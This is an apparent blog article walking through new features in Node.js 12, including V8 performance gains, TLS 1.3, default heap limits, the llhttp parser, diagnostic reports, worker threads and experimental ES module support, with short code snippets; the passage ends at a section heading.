<schema targetNamespace="" xmlns: <include schemaLocation= ""/> <element name="doc" type="Body"/> <complexType name="Body"> <element name="body"> <attribute name="bodyText" type="string"/> </element> </complexType> <complexType name="HTMLBodyCT"> <element name="HTMLBody"> <complexType> <element name="h1" type="string" content="text"/> </complexType> </element> </complexType> </schema>
This schema has defined the doc element as being a Body data type, and the doc element will contain a body child element that has a bodyText attribute. Now suppose you also want to be able to create messages from other body data types, such as the HTMLBodyCT data type defined in the schema. You could do this by creating a group element with choices.
Another option is to declare the schema as above and then substitute the HTMLBodyCT data type for the Body data type in the instance document. To do this, you will need to reference the schema instance namespace in the instance document. To use the HTMLBodyCT data type, you would need to create an instance document such as this:
<?xml version="1.0"?> <northwindMessage:doc xmlns: <HTMLBody> <h1>"Hello, world"</h1> </HTMLBody> </northwindMessage:doc>
In this example, you have used the xsi:type attribute to reference a type defined in the schema (HTMLBodyCT). The xsi:type is part of the schema instance namespace and is used to override an element's type with another type that is defined in the schema. In this example, you have now redefined the doc element as being of HTMLBodyCT data type instead of a Body data type. You could also have defined the HTMLBodyCT data type in a separate schema and used the include element in the top-level schema.
Summary
Schemas enable you to associate data types with attributes, create your own data types, and define the structure of your document using well-formed XML. Schemas are used to define elements that are associated with a name and a type. The type is either a data type or one or more attributes or elements. Elements can be grouped together in group elements, and attributes can be grouped together in attributeGroup elements. The group and attributeGroup elements can either be used locally or they can have document level scope.
Schemas provide many advantages over DTDs; namely, they use namespaces, they utilize a wide range of data types, and they are written in XML. It's likely that schemas will gradually replace DTDs over the next few years. Schemas will be discussed in more detail when we look at BizTalk in Chapter 8 and the Document Object Model in Chapter 11. | http://www.brainbell.com/tutors/XML/XML_Book_B/Overriding_Data_Types.htm | CC-MAIN-2018-43 | refinedweb | 421 | 57.5 |
Hi all,
I am wondering how to get the value a field frorm the first row without looping through all the rows?
Thanks
Hi all,
I am wondering how to get the value a field frorm the first row without looping through all the rows?
Thanks
Since the arcpy.da.SearchCursor is an iterable that returns one list per row of the table/cursor, the Python built-in next() function can be used to retrieve the next row, which would be the first row if the cursor was just created or reset.
import arcpy fc = 'c:/data/base.gdb/features' # Open a cursor on some fields in a table with arcpy.da.SearchCursor(fc, ['OID@', 'SHAPE@AREA']) as cursor: row = next(cursor) # Do something with the first row of data here del cursor
Or, something very similar, use the SearchCursor next method.
Cur = arcpy.da.SearchCursor(Feature, [Flds]) row = Cur.next()
Or to use a one-liner:
value = arcpy.da.SearchCursor(in_fc, ("YourFieldName",)).next()[0]
True, for now and in the ArcPy realm, calling the search cursor's next method will get the same result. I suggested using the built-in next method because of broader changes happening with Python outside of ArcPy. For Python 3 after PEP 3114 was approved, it meant the next() iterator method was going away. The Transition Plan for PEP 3114 covers two additional changes needed for moving to Python 3:
The built-in next function was introduced in Python 2.6 to smooth the transition. Since we know that Esri has made the leap to Python 3 with ArcGIS Pro, I suggested an approach using the built-in function. For now, Esri's implementation of the ArcPy Data Access (arcpy.da) module in ArcGIS Pro still includes cursors having explicit next() methods, but I argue the current ArcGIS Pro implementation isn't very pythonic since the explicit next() methods don't add any special functionality beyond simply iterating.
Several functionally equivalent code snippets were provided. I doubt the performance differences between the different code snippets will be noticeable, let alone significant. I think it is mostly a matter of style and what you prefer.
Lately, if I don't need to re-use the cursor, I have been using a variation of the one liner offered by Xander Bakker:
import arcpy
fc = 'c:/data/base.gdb/features'
values = next(arcpy.da.SearchCursor(fc, ['OID@', 'SHAPE@AREA']))
You still have to start a loop, but you can break out of it and kill the cursor at any time: | https://community.esri.com/thread/122522-how-to-get-the-value-of-a-field-from-the-first-row-without-looping | CC-MAIN-2018-43 | refinedweb | 423 | 63.19 |
:I've been getting these panics under moderate load, : :panic: cpu_switch: not SRUN :-- : David P. Reese, Jr. daver@xxxxxxxxxxxx Here. Before you waste time trying to get a core dump, please try this patch. I believe what is happening is that a user program is calling exit1() and an interrupt is preempting it just after exit1() sets p_stat to SZOMB. This is perfectly legal to do and the DIAGNOSTIC code is improperly panicing. That's my guess, anyway. If the patch solves the problem then we will know that is what it was. -Matt Index: i386/i386/genassym.c =================================================================== RCS file: /cvs/src/sys/i386/i386/genassym.c,v retrieving revision 1.28 diff -u -r1.28 genassym.c --- i386/i386/genassym.c 7 Aug 2003 21:17:22 -0000 1.28 +++ i386/i386/genassym.c 16 Sep 2003 02:31:13 -0000 @@ -104,6 +104,7 @@ ASSYM(SSLEEP, SSLEEP); ASSYM(SRUN, SRUN); +ASSYM(SZOMB, SZOMB); ASSYM(V_TRAP, offsetof(struct vmmeter, v_trap)); ASSYM(V_SYSCALL, offsetof(struct vmmeter, v_syscall)); ASSYM(V_SENDSYS, offsetof(struct vmmeter, v_sendsys)); Index: i386/i386/swtch.s =================================================================== RCS file: /cvs/src/sys/i386/i386/swtch.s,v retrieving revision 1.26 diff -u -r1.26 swtch.s --- i386/i386/swtch.s 7 Aug 2003 21:17:22 -0000 1.26 +++ i386/i386/swtch.s 16 Sep 2003 02:31:52 -0000 @@ -228,7 +228,10 @@ movl TD_PROC(%eax),%ecx #ifdef DIAGNOSTIC cmpb $SRUN,P_STAT(%ecx) + je 1f + cmpb $SZOMB,P_STAT(%ecx) jne badsw2 +1: #endif #if defined(SWTCH_OPTIM_STATS) | http://leaf.dragonflybsd.org/mailarchive/bugs/2003-09/msg00036.html | CC-MAIN-2015-22 | refinedweb | 250 | 69.28 |
PyX — Example: drawing/strokefill.py
Stroke and fill paths at the same time
from pyx import * c = canvas.canvas() c.stroke(path.rect(0, 0, 1, 1), [style.linewidth.Thick, color.rgb.red, deco.filled([color.rgb.green])]) c.writeEPSfile("strokefill") c.writePDFfile("strokefill")
Description.
In the example code, the filled decorator is called to pass additional styles, which will then only be used for the fill operation. Other styles passed in the second argument of the
stroke method are used for both, the stroke and the fill operation. Here we set a linewidth, which only affects the stroke operation.
A complementary functionality exists as well: you can use a
deco.stroked instance to add a stroke operation within a
fill method call.
The
filled and
stroked are pre-defined instances, but they accept a modify by call operation. This is a common feature of decorators and other attributes.
Internally, the
stroke and the
fill methods are implemented by adding either
deco.stroked or
deco.filled to the list passed as the second parameter to the
stroke or
fill method of a canvas. This whole construction is then evaluated by the
draw method of the canvas instance. The draw method is really the basic operation to output a path. It transforms a path into a so-called decorated path. The mere path itself is a pure mathematical object without any information about how it should be drawn and which styles should be applied. Output-specific properties like dashing or the linewidth are not attached to the path at all. In contrast, the decorated path attaches styles and the two output operations stroke and fill to the mathematical path object. A symmetric stroke and fill operation therefore looks like
c.draw(p, l1 + [deco.stroked(l2), deco.filled(l3)])
where
c is the canvas instance,
p is the path to be stroked and filled,
l1 is a list of styles used for both stroking and filling,
l2 are additional styles used for stroking, and
l3 are additional styles used for filling. | http://pyx.sourceforge.net/examples/drawing/strokefill.html | CC-MAIN-2013-20 | refinedweb | 340 | 65.73 |
Takewhile drops one
Here’s some naughty code.
from itertools import takewhile def take_some(pred, xs): while True: for x in takewhile(pred, xs): yield x
This code abuses the “iterator building block” foundations of Python’s itertools module. Once you’ve chopped a stream’s head off using
takewhile you can’t resume processing its tail … Or can you?
A casual inspection of this function suggests it does little more than heat up the machine: we return elements,
x, from a stream,
xs, for which
pred(x) holds, then we spin at the first element for which the predicate does not hold.
When we actually run the code, things turn out rather differently:
>>> from itertools import count, islice >>> def is_even(x): ... return x % 2 == 0 ... >>> xs = take_some(is_even, count()) >>> xs.next() 0 >>> xs.next() 2 >>> xs.next() 4 >>> list(islice(xs, 10)) [6, 8, 10, 12, 14, 16, 18, 20, 22, 24]
Dropwhile, ifilter, izip
Nothing overheats. In fact
take_some behaves suspiciously like
ifilter. Let’s explore that hypothesis by zipping together an
ifilter stream and a
take_some stream and seeing if they diverge.
>>> from itertools import dropwhile, ifilter, izip >>> xs = take_some(is_even, count()) >>> ys = ifilter(is_even, count()) >>> diverge = dropwhile(lambda xy: xy[0] == xy[1], izip(xs, ys)) >>> diverge.next() C-c C-cTraceback (most recent call last): ... KeyboardInterrupt >>>
Here
itertools.dropwhile iterates through the zipped stream yielding items as soon as it detects a difference in the first and second element of a pair. This time, as you can see, we do start spinning, and we have to interrupt execution to regain control.
Small print
Our casual interpretation of
take_some was wrong. The actual documentation for
itertools.takewhile reads:
takewhile(predicate, iterable)
Make an iterator that returns elements from the iterable as long as the predicate is true. Equivalent to:def takewhile(predicate, iterable): for x in iterable: if predicate(x): yield x else: break
There you have it! Once a stream returned by
takewhile has run its course, the original
iterable is poised to yield the element immediately after the first element for which the predicate fails. That is, we drop the first element for which the predicate fails. So repeatedly applying
takewhile to a stream drops the elements for which the predicate doesn’t hold, which is to say it generates the elements for which the predicate holds, which is of course
ifilter.
Bug fixes
Yes, kind of. I could point out a couple of bugs in
take_some. First, it doesn’t work for lists. Give it a list and each application of
takewhile resumes iteration from the beginning of the list, meaning
take_some either repeats the first element of the list forever, or it spins without yielding anything:
>>> ys = take_some(is_even, [1, 2, 3, 4]) >>> ys.next() ... KeyboardInterrupt >>> ys = take_some(is_even, [0, 1, 2, 3]) >>> ys.next() 0 >>> ys.next() 0 >>> set(islice(ys, 1000000)) set([0])
We can fix that defect easily by applying
iter to the input iterable, but that exposes the second bug, that
take_some only works for infinite streams. Once we bang into the end of an iterable, we stay there, stuck in the while loop. To fix both defects we might end up with something like:
from itertools import takewhile, tee def take_some(pred, xs): while True: xs, ys = tee(xs) try: ys.next() except StopIteration: return for x in takewhile(pred, xs): yield x
The real bug fix
Actually, the real bug, which I admitted to at the outset, is in our thinking. This code abuses the iterator-building-blocks paradigm at the heart of the itertools module.
Takewhile converts one stream into another stream; the original stream has gone and if we wanted it we should have teed it first.
The Unix shell embeds this concept at the core of the language to great effect. Once again our building block is the stream but our connector, the pipeline operator, |, doesn’t allow this kind of abuse; all you can do is put a stream to its left and another to its right. The syntax won’t allow you to get the head and tail of the same stream in a single pipeline.
Here’s an awkless variant of the recent shell history meme which shows a shell pipeline in action.
$ history | tr -s ' ' | cut -f 3 -d ' ' | sort | uniq -c | sort -rn 172 cd 147 svn 73 bin/mheg 57 make 54 ls 40 emacs 37 pwd ...
Here’s a slightly more interesting variant which only shows commands appearing after a pipeline operator. (It’s not bombproof, but it’ll do for now.)
$ history | grep -Eo '\| *\w+' | tr -d '| ' | sort | uniq -c | sort -rn 10 head 8 cut 7 grep 6 tr 5 xargs 4 sort 3 wc 3 uniq 3 less ...
Pipe Links
By way of an apology for wasting your time, here are some solid gold links.
“Generator Tricks for Systems Programmers”, a presentation made by David M. Beazley at PyCon’08. I wasn’t there, but for once the slides (PDF) standalone well, and despite the title it’s neither tricksy nor just for systems programmers. Experienced Python programmers might choose to skip over the first few slides; by the end of the presentation, the material gets much more advanced[1].
“Shell-like data processing” by Maxim Krikun in the online Python Cookbook, which overloads the bitwise or operator,
|, to implement a Pythonic pipeline, an idea you can find extended in “Assembly Line Syntax” by Patrick Roberts and revised by Michael Foord, this time using the right shift operator as a connector.
Pipelined Python
81.107.39.38 - ... "GET /ply/ HTTP/1.1" 200 7587 81.107.39.38 - ... "GET /favicon.ico HTTP/1.1" 404 133 81.107.39.38 - ... "GET /ply/bookplug.gif HTTP/1.1" 200 23903 81.107.39.38 - ... "GET /ply/ply.html HTTP/1.1" 200 97238 81.107.39.38 - ... "GET /ply/example.html HTTP/1.1" 200 2359 66.249.72.134 - ... "GET /index.html HTTP/1.1" 200 4447 ...
In his presentation David Beazley shows some elegant and idiomatic Python code to sum the total number of bytes transferred in an Apache httpd server log (the final field on each line of the log file shown above). You’ll notice how clean and declarative it is. Each generator expression builds upon the one on the preceding line. The source of the stream,
wwwlog, is a file object which, in the iterable context shown here, yields lines on demand. Nothing really happens until the final reduction,
sum, at which point data flows smoothly through. Stream elements — lines, words, ints — are processed one at a time, and nothing accumulates except the final total.
wwwlog = open("access-log") bytecolumn = (line.rsplit(None,1)[1] for line in wwwlog) bytes = (int(x) for x in bytecolumn if x != '-') print "Total", sum(bytes)
Here’s an alternative using the Python pipeline approach mentioned in the previous section. Note that in my server access logs it’s the 9th field (whitespace separated, counting from zero) which gives the number of bytes transferred, and for variety I’m pattern matching this field to a string of digits.
wwwlog = open("access-log") bytes = wwwlog | cut(9) | grep(r'\d+') | xlate(int) print "Total", sum(bytes)
Cut,
grep and
xlate are simple classes which implement the numeric __ror__ method.
import itertools import re class xlate(object): "Translate the input stream by applying a function to each item". def __init__(self, fn): self.fn = fn def __ror__(self, stream): return itertools.imap(self.fn, stream) class cut(xlate): "Cuts a whitespace separated column from a stream of lines." def __init__(self, column): super(cut, self).__init__(lambda s: s.split()[column]) class grep(object): "Grep lines which match an re from a stream of lines." def __init__(self, pattern): self.match = re.compile(pattern).match def __ror__(self, stream): return itertools.ifilter(self.match, stream)
[1] It could be that I’m reading too much into the pipe metaphor, but I’m intrigued by the caption to the photo on David M. Beazley’s homepage. What can he mean?
Dave working on his latest project — “you know, it’s a series of tubes.” | http://wordaligned.org/articles/takewhile-drops-one | crawl-002 | refinedweb | 1,368 | 64.61 |
You don't want to invoke one of the JUnit test runners. Instead, you would like to run your test directly.
Add a main( ) method to your test case. Or, use Ant to run your tests as discussed in Chapter 3.
Adding a main( ) method can make a class easier to run. Most IDEs allow you to click on a class and select some sort of "run" option from a popup menu, provided the class has a main( ) method. Here is a sample main( ) method for our TestGame class:
public class TestGame extends TestCase { ... public static void main(String[] args) { junit.textui.TestRunner.run(new TestSuite(TestGame.class)); } }
When executed, this method runs the test suite in text mode. Output is sent to the console.
Recipe 4.3 shows how to run unit tests. Chapter 3 shows how to run tests using Ant. | https://etutorials.org/Programming/Java+extreme+programming/Chapter+4.+JUnit/4.9+Running+a+Test+Class+Directly/ | CC-MAIN-2022-21 | refinedweb | 143 | 85.49 |
, no doubt many of its excesses will be tamed from within the project. But some users aren’t waiting around for Kubernetes to get any easier to work with, and have rolled their own solutions to many common problems with Kubernetes in production.
Goldpinger: Visualize Kubernetes clusters
Humans are visual creatures. Graphs and charts make it easier for us to understand the big picture. And given the scope and complexity of a Kubernetes cluster, we could use all of the visual help we can get..
K9s: Full-screen Kubernetes CLI UI
Admins love “single pane of glass” utilities. K9s is a full-screen CLI UI for Kubernetes clusters. It gives you views of running pods, logs, and deployments at a glance, along with quick access to a shell. Note that you will need to grant users Kubernetes read privileges at the user and namespace level for K9s to work properly.
Kops: Command-line ops for Kubernetes clusters
Developed by the Kubernetes team, Kops allows you to manage Kubernetes clusters from the command line. It supports clusters running on AWS and GCE, with VMware vSphere and other environments in the works. In addition to automating the setup and teardown process, Kops helps with other kinds of automation. For instance, it can generate Terraform configurations to allow a cluster to be redeployed using Terraform.
Kubebox: Terminal console for Kubernetes
An advanced terminal console for Kubernetes, Kubebox provides more than just a glorified shell to Kubernetes and its API. It provides interactive displays of memory and CPU utilization, lists of pods, running logs, and configuration editors. Best of all, it’s available as a standalone application for Linux, Windows, and MacOS.
Kube-applier
Running as a Kubernetes service, Kube-applier fetches declarative configuration files for a Kubernetes cluster from a Git repository and applies them to the pods in the cluster. Whenever changes are made to the definition files, they’re pulled from the repo and applied to the pods in question. In essence, Kube-applier is like Google’s Skaffold, except it’s for managing a whole Kubernetes cluster instead of a single app.
Kube-applier can apply configuration changes on a schedule or on demand. It logs its behavior each time it runs, and it provides Prometheus-compatible metrics so that you’re not in the dark about how it might affect cluster behavior.
Kube-ps1: Smart Kubernetes command prompt
No, Kube-ps1 isn’t a first-gen Sony PlayStation emulator for Kubernetes (although that would be rather nifty). It’s a simple addition to Bash that displays the current Kubernetes context and namespace in the prompt. Kube-shell includes this along with a great many other features, but if all you want is the smarter prompt, Kube-ps1 provides it with little overhead.
Kube-prompt: Interactive Kubernetes client
Another minimal but useful modification to the Kubernetes CLI, Kube-prompt allows you to enter what amounts to an interactive command session with the Kubernetes client. Kube-prompt spares you from having to type
kubectl to prefix every command, and provides autocomplete with contextual information for each command.
Kubespy: Real-time monitoring of Kubernetes resources
Pulumi’s Kubespy is a diagnostic tool that allows you to trace changes to a Kubernetes resource in real time, providing you with a kind of text-view dashboard of the goings-on. For instance, you could watch the changes to a pod’s status as it is booted up: the pod definition being written to Etcd, the pod being scheduled to run on a node, the Kubelet on the node creating the pod, and the pod finally being marked as running. Kubespy can run as a standalone binary or as a plug-in to Kubectl.
Kubeval: Validate Kubernetes configurations
Kubernetes’ YAML configuration files are meant to be human-readable, but that doesn’t always mean they’re human-validatable. It’s easy to miss a dropped comma or fat-fingered name and not find out about it until it’s too late. Better to use Kubeval. Used locally or integrated into your CI/CD pipeline, Kubeval takes in a Kubernetes YAML configuration definition and reports back on its validity. It can produce JSON or TAP-formatted output, and can even parse the source templates referenced in a Helm chart configuration without needing additional prompting.
Kube-ops-view: Dashboard for multiple Kubernetes clusters
Kubernetes has a useful dashboard for general-purpose monitoring, but the Kubernetes community is experimenting with other ways to present data usefully to the Kubernetes admin. Kube-ops-view is one such experiment; it provides a broad at-a-glance view of multiple Kubernetes clusters, rendered graphically, so one can see at a glance the CPU and memory usage and status of pods across a cluster. Note that it doesn’t allow you to invoke any commands; it’s strictly for visualization. But the visualizations it provides are striking and efficient, born for a wall monitor in your operations center.
Rio: App deployment engine for Kubernetes
Rio, a project of Rancher Labs, implements common application deployment patterns in Kubernetes such as continuous delivery from Git and A/B or blue/green deployments. Rio can deploy a new version of your app whenever you make a commit, helpfully managing complexities like DNS, HTTPS, and service meshes.
Stern and Kubetail: Log tailing for Kubernetes
Stern lets you produce color-coded output (as per the
tail command) from pods and containers in Kubernetes. It’s a quick way to pipe all the output from multiple resources into a single stream that can be read at a glance. At the same time, you have an at-a-glance way (the color coding) to distinguish the streams.
Kubetail similarly aggregates logs from multiple pods into a single stream, color-coding different pods and containers. But Kubetail is a Bash script, so it requires nothing more than a shell. | https://www.infoworld.com/article/3488817/12-tools-that-make-kubernetes-easier.html | CC-MAIN-2021-43 | refinedweb | 979 | 50.67 |
Directs all graphics requests to an Fl_Image. More...
#include <Fl_Image_Surface.H>
Directs all graphics requests to an Fl_Image.
After creation of an Fl_Image_Surface object, call set_current() on it, and all subsequent graphics requests will be recorded in the image. It's possible to draw widgets (using Fl_Image_Surface::draw()) or to use any of the Drawing functions or the Color & Font functions. Finally, call image() on the object to obtain a newly allocated Fl_RGB_Image object.
Fl_GL_Window objects can be drawn in the image as well.
Usage example:
Constructor with optional high resolution.
Returns the name of the class of this object.
Use of the class_name() function is discouraged because it will be removed from future FLTK versions.
The class of an instance of an Fl_Device subclass can be checked with code such as:
Reimplemented from Fl_Surface_Device.
Draws a widget in the image surface.
Draws a window and its borders and title bar to the image drawing surface.
Returns a possibly high resolution image made of all drawings sent to the Fl_Image_Surface object.
The Fl_Image_Surface object should have been constructed with Fl_Image_Surface(W, H, 1). The returned image is scaled to a size of WxH drawing units and may have a pixel size twice as wide and high. The returned object should be deallocated with Fl_Shared_Image::release() after use.
Returns an image made of all drawings sent to the Fl_Image_Surface object.
The returned object contains its own copy of the RGB data. Prefer Fl_Image_Surface::highres_image() if the surface was constructed with the highres option on.
Make this surface the current drawing surface.
This surface will receive all future graphics requests.
Reimplemented from Fl_Surface_Device. | http://www.fltk.org/doc-1.3/classFl__Image__Surface.html | CC-MAIN-2017-47 | refinedweb | 271 | 59.3 |
So, I may have to backtrack on what I was saying earlier. Specifically, I called
clisp a toy shell, and I called the machine I'm currently typing this on a toy machine. I did this because, having just installed it and spent a grand total of five minutes poking around, I assumed
- it wouldn't run some programs properly
- my scripts would now be useless
- cd wouldn't work
- I'd lose tab completion on files
- there would be no gains to offset all the losses
- it would be a pain in the ass to use a regular shell when I hit the limits of
clisp
It turns out that most of those don't apply. I did actually lose tab-completion when working with files, but that's it. Pretty much every program that I want to run typically[1] works just as well from
clisp as it does in
bash, scripts run exactly the same as under a standard shell when you use
run-shell-command,
cd is actually a function defined in
clisps'
cl-user, and when I need to run a regular bash for whatever reason
eshell can pickup the slack.
There's also a few non-obvious things I gain to offset losing filename tab completion.
First off, I get to define helper functions at my command line. One situation I've already found this useful in is copying files off my previous computer. It's a fairly specific situation, because I didn't want to sync a complete directory, but rather surgically copy over some 12 or 13 irregularly named files. That would have taken 12 or 13 separate scp calls. In regular shell, I'd have to do something like write a script for it. Having an actual language available let me pull out my first trick
> (defun cp-file (file-name) (run-shell-command (format nil "scp inaimathi@other-machine:.emacs.d/~a .emacs.d/"))) CP-FILE > (cp-file "example.el")
This isn't specific to
clisp, obviously. I assume that any language shell you use could pull the same trick. Still, having the ability to define helpers on the fly is something I occasionally wish I had[2].
Another thing that I imagine would work in any language shell, is an easier way of defining shell scripts. I wrote a little set of ui utilities a while ago, one of which is
pack, a translator for various archive formats so that I can write
pack foo rather than
tar -xyzomgwtfbbq foo.tar.gz foo
#!/usr/bin/ruby require 'optparse' require 'pp' require 'fileutils' archive_types = { "tar" => ["tar", "-cvf"], "tar.gz" => ["tar", "-zcvf"], "tgz" => ["tar", "-zcvf"], "tar.bz2" => ["tar", "-jcvf"], "zip" => ["zip"] } ########## parsing inputs options = { :type => "tar", :excluded => [".git", ".gitignore", "*~"] } optparse = OptionParser.new do|opts| opts.on("-e", "--exclude a,b,c", Array, "Specify things to ignore. Defaults to [#{options[:excluded].join ", "}]") do |e| options[:excluded] = e end opts.on("-t", "--type FILE-TYPE", "Specify archive type to make. Defaults to '#{options[:type]}'. Supported types: #{archive_types.keys.join ", "}") do |t| options[:type] = t end end optparse.parse! ########## ARGV.each do |target| if not archive_types[options[:type]] puts "Supported types are #{archive_types.keys.join ", "}" exit elsif options[:type] == "zip" exclude = options[:excluded].map{|d| ["-x", d]}.flatten else exclude = options[:excluded].map{|d| ["--exclude", d]}.flatten end fname = target.sub(/\/$/, "") args = archive_types[options[:type]] + [fname + "." + options[:type], fname] + exclude system(*args) end
So that was necessary in bash, and because shell scripts can't easily share data, the companion script,
unpack, had to define almost the exact same set of file-extension-to-command/option mappings[3]. If I'm using
clisp, I could instead write
(defun pack (file-name &key (type tar) (exclude '(".git" ".gitignore" "*~"))) (pack-file (make-instance type :file-name file-name :excluded exclude))) (defmethod pack-file ((f tar.gz)) (run-shell-command (format nil "tar -zcvf ~@[~{--exclude ~a~^~}~]~a" (excluded f) (file-name f))))
and be done with it[4]. This is a similar, but more extreme version of the previous point. Instead of writing shell-scripts, I can now write functions, macros or methods. These are smaller conceptual units and deal with inputs more easily, letting me focus on expressing what I want the script to do. In fact looking at language shells this way makes it obvious that things like
optparse are just hacks to get around the way that scripts accept arguments.
The last cool thing is to do with the package management. I could be wrong about this, but I don't think the Lisp notion of
in-package exists elsewhere. So I can define a package like
(defpackage :apt-get (:use :cl)) (defun install (&rest packages) (su-cmd "apt-get install ~{~(~a~)~^ ~}" packages)) (defun update () (su-cmd "apt-get update")) (defun search (search-string) (cmd "apt-cache search '~a'" search-string))
where the
cmds are defined as something like
(defmacro cmd (command &rest args) `(run-shell-command (if args `(format nil ,command ,@args) `command))) (defmacro su-cmd (command &rest args) `(run-shell-command (format nil "su -c \"~a\"" (if args `(format nil ,command ,@args) `command))))
The issue I'd have with defining these in, for example a Python shell, is that I'd then have a choice. I could either
import the file and put up with typing out the name of the module at every invocation, or I could
import install, update, search from and then hope that I don't have to define conflicting functions[5]. In a Lisp shell, I can define it and load it and then do
(in-package :apt-get) when I need to do a series of commands relating to installing new modules.
Now all of these, clisp-exclusive or not, are small syntactic fixes that work around basic shell annoyances. To the point that you're probably asking yourself what the big deal is. It's basically the same reason that macros are awesome; they get rid of inconsistencies at the most basic levels of your code, and the increased simplicity you get that way has noticeable impacts further up the abstraction ladder. The sorts of things that look like minor annoyances can add up to some pretty hairy code, and cutting it off at the root often saves you more trouble than you'd think.
I'll admit that tab completion on file names is a pretty big thing to lose[6], but the things I outline above are mighty tempting productivity boosts to my shell. To the point that I'm fairly seriously debating switching over on my main machine. Between Emacs, StumpWM/Xmonad and Conkeror, it's not really as if someone else can productively use my laptop anyway. Adding an esoteric shell really doesn't seem like it would be a big negative at this point.
Footnotes
1 - [back] - Including fairly complex CLI stuff like
wicd-curses,
mplayer and
rsync --progress
2 - [back] - And now, I do
3 - [back] - Except for compression rather than expansion
4 - [back] - Defining methods for each archive type, and the appropriate class, obviously
5 - [back] - Or import another module that defines new ones with the same names
6 - [back] - And I'm going to put a bit of research into not losing it | http://langnostic.blogspot.com/2012/01/lisp-shell-followup.html | CC-MAIN-2017-39 | refinedweb | 1,206 | 61.36 |
Introduction
Node.
Node 12 new & improved
Why is JavaScript about to get a lot better? Node.js 12 just dropped a few months ago.
On April 23rd, 2019, Node.js 12 officially launched, and JavaScript enthusiasts everywhere rejoiced. And let’s be clear, this isn’t just a regular old version update, this is a big overhaul with some major upgrades, let’s go down the list of highlights.
V8 JavaScript engine upgrades
In addition to the expected performance tweaks and improvements that come with every new version of the JavaScript V8 engine, there are some really noteworthy upgrades this time around. These include:
- Zero-cost async stack traces – this will serve to enrich the
error.stackproperty with asynchronous call frames without adding extra runtime to the V8 engine
- Faster calls with arguments mismatch – in the past, V8 had to handle all function calls with too many or too few parameters the same way, which came at a performance cost. Now, it’s smart enough to know when it can skip this step, reducing call overhead up to 60%
- Faster async functions and promises – yes indeed, using async is actually two extra microticks faster than promises now, if you needed a reason besides the more synchronous-style syntax async / await provides to developers unfamiliar with promises
- Faster JavaScript parsing – at startup of a web page, just under 10% of the V8 time is spent parsing JS. The latest JavaScript parser released has improved parsing speed by up to 30% on desktops
More secure security with TLS 1.3
TLS, which stands for transport layer security, is how Node handles encrypted stream communication.
With the release of Node.js 12, TLS gets an upgrade to version 1.3, which sounds insignificant, but is actually a major update, with numerous performance and security enhancements. Although it sounds counterintuitive at first, TLS 1.3 is actually a simpler protocol to implement than TLS 1.2, making it more secure, easier to configure, and quicker to negotiate sessions between applications.
By using TLS 1.3, Node apps will have increased end-user privacy while also improving the performance of requests by reducing the time required for the HTTPS handshake.
Bottom line: better security for everyone using it and less latency between communicating services. That’s a major win to me.
Properly configured default heap limits
Now, let’s talk about some lower level improvements. Up to this point, the JavaScript heap size defaulted to the max heap sizes set by V8 for use with browsers, unless manually configured otherwise. With the release of Node.js 12, the JS heap size will be configured based on available memory, which ensures Node doesn’t try to use more memory than is available and terminate processes when its memory is exhausted.
Say goodbye to out of memory errors – at least some of the time – when processing large amounts of data. The old
--max-old-space-size flag will still be available to set a different limit if needed, but hopefully, this feature will reduce the need for setting the flag.
The default http parser becomes llhttp
Unbeknownst to many (myself included), the current
http_parser library used in Node has been extremely difficult to maintain and improve upon, which is why llhttp was born. The project is a port of http_parser to TypeScript, which is then run through llparse to generate the C or bitcode output.
Turns out, llhttp is faster than http_parser by 156%, it’s written in fewer lines of code, and all performance optimizations are generated automatically, as opposed to http_parser’s hand-optimized code.
In Node.js 12, they’ve decided to switch the default parser to llhttp for the first time, and more thoroughly, put it to the test. Let’s hope it continues to perform well when lots of different applications with lots of different needs are trying it out.
Diagnostic reports on demand
Switching the conversation to debugging, there’s a new experimental feature in Node.js 12 allowing users to generate a report on demand or when certain trigger events occur.
This kind of real-time reporting can help diagnose problems in production including crashes, slow performance, memory leaks, high CPU usage, unexpected errors, etc. – the kind of stuff that usually takes hours if not days to debug, diagnose and fix.
Integrated heap dumps
Another feature in this release around heaps, sure to speed up the debugging process, is integrated heap dumps, which ships with Node.js 12, already built in.
Now there’s no need to install new modules to investigate memory issues – just tell Node what kind of JSON-formatted diagnostic summary you want via the command line or an API call and parse through all of the info you can handle.
Native modules get easier in Node.js
Stepping back from the low-level improvements, there’s some cool stuff also coming for developers and module makers within the Node ecosystem.
Making and building native modules for Node continues to improve, with changes that include better support for native modules in combination with worker threads, as well as the version 4 release of the N-API, which makes.
Worker threads are coming – the experimental flag has been removed
Worker threads, while they’ve been around since Node 10, no longer require a flag to be enabled – they’re well on their way to moving out of the experimental phase. Prior to Node.js 11.7.0, you could not access the worker thread module unless you started
node with the
--experimental-worker flag in the command line.
$. ([eval]-wrapper:6:22) at Module._compile (internal/modules/cjs/loader.js:721:30) at evalScript (internal/bootstrap/node.js:720:27) $ $ node --experimental-worker -e "require('worker_threads'); console.log('success');" success $
Workers really shine when performing CPU-intensive JavaScript operations, they won’t help much with I/O-intensive work. Node’s built-in asynchronous I/O operations are more efficient than Workers can be.
Startup time improvements
Node.js 11 reduced startup time of worker threads almost 60% by using built-in code cache support.
Node 12 has built upon this idea to generate the code cache for built-in libraries in advance at build time, allowing the main thread to use the code cache to start up the initial load of any built-in library written in JavaScript.
The end result is another 30% speedup in startup time for the main thread, and your apps will load for users faster than ever before.
ES6 module support, it’s almost here 🙌
I saved the best for last. One of the most exciting features to me is ES6 module support – the thing so many of us have been waiting for. This feature is still experimental, and the Node team is looking for feedback from people trying it out, but just imagine being able to transition seamlessly from front-end to back-end JavaScript with nary a care in the world.
Here’s the best of what the latest version of
-–experimental-modules contains:
- ES2015 import statements that reference JavaScript files with relative URLs
./examples.js, absolute URLs, package names
example-packageor paths within packages
example-package/lib/examples.jsare all supported.
// relative urls ‘./examples.js’ // absolute URLs ‘’ // package names ‘example-package’ // paths within packages example-package/lib/examples.js
- Import and export syntax in
.jsfiles works. Finally, devs can specify default exports
import test from
'./examples', named exports
import {example1, example2} from './examples'and namespace exports
import * as samples from './examples'just as we’ve been doing in traditional JavaScript since ES6 came about.
// default imports / exports import test from ‘./examples’ // named imports / exports import {example1, example2} from ‘./examples’ // namespace exports import * as samples from ‘./examples’
- Add
"type": "module"to the
package.jsonfor a project, and Node.js will treat all
.jsfiles in the project as ES modules. This approach allows Node to use the
package.jsonfor package-level metadata and configuration, similar to how it’s already used by Babel and other bundling and configuration tools.
- Explicit extensions for files will be treated as modules with the
.mjsending, and files to be treated as CommonJS with the
.cjs. These are files which still use
requireand
module.exports-type syntax.
Hallelujah! I’m really stoked for when this comes out from behind the flag for full adoption.
New compiler & platform minimum standards for Node 12
